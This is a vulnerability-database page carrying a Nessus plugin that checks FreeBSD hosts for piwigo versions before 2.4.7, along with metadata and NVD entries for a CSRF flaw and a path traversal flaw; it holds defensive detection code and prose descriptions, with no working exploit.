Search...

FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)

2013-03-20T00:00:00

ID FREEBSD_PKG_EDD201A58FC311E2B131000C299B62E1.NASL
Type nessus
Reporter This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2013-03-20T00:00:00

Description

High-Tech Bridge Security Research Lab reports :

The CSRF vulnerability exists due to insufficient verification of the HTTP request origin in '/admin.php' script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.

The path traversal vulnerability exists due to insufficient filtration of user-supplied input in 'dl' HTTP GET parameter passed to '/install.php' script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
#    copyright notice, this list of conditions and the following
#    disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
#    published online in any format, converted to PDF, PostScript,
#    RTF and other formats) must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
# 
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(65624);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2013-1468", "CVE-2013-1469");

  script_name(english:"FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)");
  script_summary(english:"Checks for updated package in pkg_info output");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote FreeBSD host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"High-Tech Bridge Security Research Lab reports :

The CSRF vulnerability exists due to insufficient verification of the
HTTP request origin in '/admin.php' script. A remote attacker can
trick a logged-in administrator to visit a specially crafted webpage
and create arbitrary PHP file on the remote server.

The path traversal vulnerability exists due to insufficient filtration
of user-supplied input in 'dl' HTTP GET parameter passed to
'/install.php' script. The script is present on the system after
installation by default, and can be accessed by attacker without any
restrictions."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://piwigo.org/bugs/view.php?id=0002843"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://piwigo.org/bugs/view.php?id=0002844"
  );
  # http://dl.packetstormsecurity.net/1302-exploits/piwigo246-traversalxsrf.txt
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?505a28f2"
  );
  # https://vuxml.freebsd.org/freebsd/edd201a5-8fc3-11e2-b131-000c299b62e1.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?f2e0ceeb"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected package.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:piwigo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/02/06");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/03/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/20");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"piwigo&lt;2.4.7")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:pkg_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "FREEBSD_PKG_EDD201A58FC311E2B131000C299B62E1.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)", "description": "High-Tech Bridge Security Research Lab reports :\n\nThe CSRF vulnerability exists due to insufficient verification of the\nHTTP request origin in '/admin.php' script. A remote attacker can\ntrick a logged-in administrator to visit a specially crafted webpage\nand create arbitrary PHP file on the remote server.\n\nThe path traversal vulnerability exists due to insufficient filtration\nof user-supplied input in 'dl' HTTP GET parameter passed to\n'/install.php' script. The script is present on the system after\ninstallation by default, and can be accessed by attacker without any\nrestrictions.", "published": "2013-03-20T00:00:00", "modified": "2013-03-20T00:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/65624", "reporter": "This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://piwigo.org/bugs/view.php?id=0002843", "http://www.nessus.org/u?505a28f2", "http://www.nessus.org/u?f2e0ceeb", "http://piwigo.org/bugs/view.php?id=0002844"], "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "type": "nessus", "lastseen": "2021-01-07T10:51:20", "edition": 23, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1468", "CVE-2013-1469"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803340"]}, {"type": "zdt", "idList": ["1337DAY-ID-20461"]}, {"type": "exploitdb", "idList": ["EDB-ID:24520", "EDB-ID:24561"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12923", "SECURITYVULNS:DOC:29128"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120592", "PACKETSTORM:129665"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FC43DD51AE00C5F5F8AE623AD85B84A9", "EXPLOITPACK:35BF0A351E54F0662E6298A2615F1201"]}, {"type": "htbridge", "idList": ["HTB23144"]}, {"type": "freebsd", "idList": ["EDD201A5-8FC3-11E2-B131-000C299B62E1"]}, {"type": "zeroscience", "idList": ["ZSL-2013-5127"]}, {"type": "nessus", "idList": ["PIWIGO_INSTALL_FILE_DISCLOSURE.NASL"]}], "modified": "2021-01-07T10:51:20", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-01-07T10:51:20", "rev": 2}, "vulnersScore": 5.9}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65624);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1468\", \"CVE-2013-1469\");\n\n script_name(english:\"FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"High-Tech Bridge Security Research Lab reports :\n\nThe CSRF vulnerability exists due to insufficient verification of the\nHTTP request origin in '/admin.php' script. A remote attacker can\ntrick a logged-in administrator to visit a specially crafted webpage\nand create arbitrary PHP file on the remote server.\n\nThe path traversal vulnerability exists due to insufficient filtration\nof user-supplied input in 'dl' HTTP GET parameter passed to\n'/install.php' script. The script is present on the system after\ninstallation by default, and can be accessed by attacker without any\nrestrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://piwigo.org/bugs/view.php?id=0002843\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://piwigo.org/bugs/view.php?id=0002844\"\n );\n # http://dl.packetstormsecurity.net/1302-exploits/piwigo246-traversalxsrf.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?505a28f2\"\n );\n # https://vuxml.freebsd.org/freebsd/edd201a5-8fc3-11e2-b131-000c299b62e1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2e0ceeb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:piwigo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"piwigo<2.4.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "65624", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:piwigo"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Directory traversal vulnerability in install.php in Piwigo before 2.4.7 allows remote attackers to read and delete arbitrary files via a .. (dot dot) in the dl parameter.", "edition": 5, "cvss3": {}, "published": "2013-03-13T20:55:00", "title": "CVE-2013-1469", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1469"], "modified": "2013-03-19T04:00:00", "cpe": ["cpe:/a:piwigo:piwigo:1.7.0", "cpe:/a:piwigo:piwigo:2.0.9", "cpe:/a:piwigo:piwigo:1.7.1", "cpe:/a:piwigo:piwigo:2.2.3", "cpe:/a:piwigo:piwigo:2.3.4", "cpe:/a:piwigo:piwigo:2.0.10", "cpe:/a:piwigo:piwigo:1.3.1", "cpe:/a:piwigo:piwigo:1.2.1", "cpe:/a:piwigo:piwigo:2.1.1", "cpe:/a:piwigo:piwigo:1.1.0", "cpe:/a:piwigo:piwigo:2.1.2", "cpe:/a:piwigo:piwigo:1.0.1", "cpe:/a:piwigo:piwigo:2.0.1", "cpe:/a:piwigo:piwigo:2.1.0", "cpe:/a:piwigo:piwigo:2.2.4", "cpe:/a:piwigo:piwigo:1.6.0", "cpe:/a:piwigo:piwigo:1.6.1", "cpe:/a:piwigo:piwigo:2.3.2", "cpe:/a:piwigo:piwigo:1.7.3", "cpe:/a:piwigo:piwigo:1.6.2", "cpe:/a:piwigo:piwigo:1.2.0", "cpe:/a:piwigo:piwigo:2.0.7", "cpe:/a:piwigo:piwigo:2.4.4", "cpe:/a:piwigo:piwigo:2.4.6", "cpe:/a:piwigo:piwigo:2.2.0", "cpe:/a:piwigo:piwigo:2.1.5", "cpe:/a:piwigo:piwigo:2.3.3", "cpe:/a:piwigo:piwigo:2.0.8", "cpe:/a:piwigo:piwigo:2.4.1", "cpe:/a:piwigo:piwigo:1.3.3", "cpe:/a:piwigo:piwigo:1.4.0", "cpe:/a:piwigo:piwigo:2.0.5", "cpe:/a:piwigo:piwigo:1.5.2", "cpe:/a:piwigo:piwigo:2.1.6", "cpe:/a:piwigo:piwigo:1.0.0", "cpe:/a:piwigo:piwigo:1.3.0", "cpe:/a:piwigo:piwigo:2.2.1", "cpe:/a:piwigo:piwigo:2.4.2", "cpe:/a:piwigo:piwigo:2.4.5", "cpe:/a:piwigo:piwigo:1.3.2", "cpe:/a:piwigo:piwigo:2.0.4", "cpe:/a:piwigo:piwigo:2.0.6", "cpe:/a:piwigo:piwigo:2.1.3", "cpe:/a:piwigo:piwigo:1.0.2", "cpe:/a:piwigo:piwigo:1.5.0", "cpe:/a:piwigo:piwigo:2.3.5", "cpe:/a:piwigo:piwigo:1.5.1", "cpe:/a:piwigo:piwigo:2.0", "cpe:/a:piwigo:piwigo:1.3.4", "cpe:/a:piwigo:piwigo:2.1.4", "cpe:/a:piwigo:piwigo:2.0.3", "cpe:/a:piwigo:piwigo:1.7.2", "cpe:/a:piwigo:piwigo:2.2.5", "cpe:/a:piwigo:piwigo:2.3.0", "cpe:/a:piwigo:piwigo:2.4.3", "cpe:/a:piwigo:piwigo:2.0.0", "cpe:/a:piwigo:piwigo:2.2.2", "cpe:/a:piwigo:piwigo:2.0.2", "cpe:/a:piwigo:piwigo:2.3.1", "cpe:/a:piwigo:piwigo:2.4.0", "cpe:/a:piwigo:piwigo:1.4.1"], "id": "CVE-2013-1469", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1469", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:piwigo:piwigo:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:39", "description": "Cross-site request forgery (CSRF) vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2013-03-14T03:13:00", "title": "CVE-2013-1468", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1468"], "modified": "2013-10-03T18:49:00", "cpe": ["cpe:/a:piwigo:piwigo:1.7.0", "cpe:/a:piwigo:piwigo:2.0.9", "cpe:/a:piwigo:piwigo:1.7.1", "cpe:/a:piwigo:piwigo:2.2.3", "cpe:/a:piwigo:piwigo:2.3.4", "cpe:/a:piwigo:piwigo:2.0.10", "cpe:/a:piwigo:piwigo:1.3.1", "cpe:/a:piwigo:piwigo:1.2.1", "cpe:/a:piwigo:piwigo:2.1.1", "cpe:/a:piwigo:piwigo:1.1.0", "cpe:/a:piwigo:piwigo:2.1.2", "cpe:/a:piwigo:piwigo:1.0.1", "cpe:/a:piwigo:piwigo:2.0.1", "cpe:/a:piwigo:piwigo:2.1.0", "cpe:/a:piwigo:piwigo:2.2.4", "cpe:/a:piwigo:piwigo:1.6.0", "cpe:/a:piwigo:piwigo:1.6.1", "cpe:/a:piwigo:piwigo:2.3.2", "cpe:/a:piwigo:piwigo:1.7.3", "cpe:/a:piwigo:piwigo:1.6.2", "cpe:/a:piwigo:piwigo:1.2.0", "cpe:/a:piwigo:piwigo:2.0.7", "cpe:/a:piwigo:piwigo:2.4.4", "cpe:/a:piwigo:piwigo:2.4.6", "cpe:/a:piwigo:piwigo:2.2.0", "cpe:/a:piwigo:piwigo:2.1.5", "cpe:/a:piwigo:piwigo:2.3.3", "cpe:/a:piwigo:piwigo:2.0.8", "cpe:/a:piwigo:piwigo:2.4.1", "cpe:/a:piwigo:piwigo:1.3.3", "cpe:/a:piwigo:piwigo:1.4.0", "cpe:/a:piwigo:piwigo:2.0.5", "cpe:/a:piwigo:piwigo:1.5.2", "cpe:/a:piwigo:piwigo:2.1.6", "cpe:/a:piwigo:piwigo:1.0.0", "cpe:/a:piwigo:piwigo:1.3.0", "cpe:/a:piwigo:piwigo:2.2.1", "cpe:/a:piwigo:piwigo:2.4.2", "cpe:/a:piwigo:piwigo:2.4.5", "cpe:/a:piwigo:piwigo:1.3.2", "cpe:/a:piwigo:piwigo:2.0.4", "cpe:/a:piwigo:piwigo:2.0.6", "cpe:/a:piwigo:piwigo:2.1.3", "cpe:/a:piwigo:piwigo:1.0.2", "cpe:/a:piwigo:piwigo:1.5.0", "cpe:/a:piwigo:piwigo:2.3.5", "cpe:/a:piwigo:piwigo:1.5.1", "cpe:/a:piwigo:piwigo:2.0", "cpe:/a:piwigo:piwigo:1.3.4", "cpe:/a:piwigo:piwigo:2.1.4", "cpe:/a:piwigo:piwigo:2.0.3", "cpe:/a:piwigo:piwigo:1.7.2", "cpe:/a:piwigo:piwigo:2.2.5", "cpe:/a:piwigo:piwigo:2.3.0", "cpe:/a:piwigo:piwigo:2.4.3", "cpe:/a:piwigo:piwigo:2.0.0", "cpe:/a:piwigo:piwigo:2.2.2", "cpe:/a:piwigo:piwigo:2.0.2", "cpe:/a:piwigo:piwigo:2.3.1", "cpe:/a:piwigo:piwigo:2.4.0", "cpe:/a:piwigo:piwigo:1.4.1"], "id": "CVE-2013-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1468", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:piwigo:piwigo:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:piwigo:piwigo:2.2.2:*:*:*:*:*:*:*", 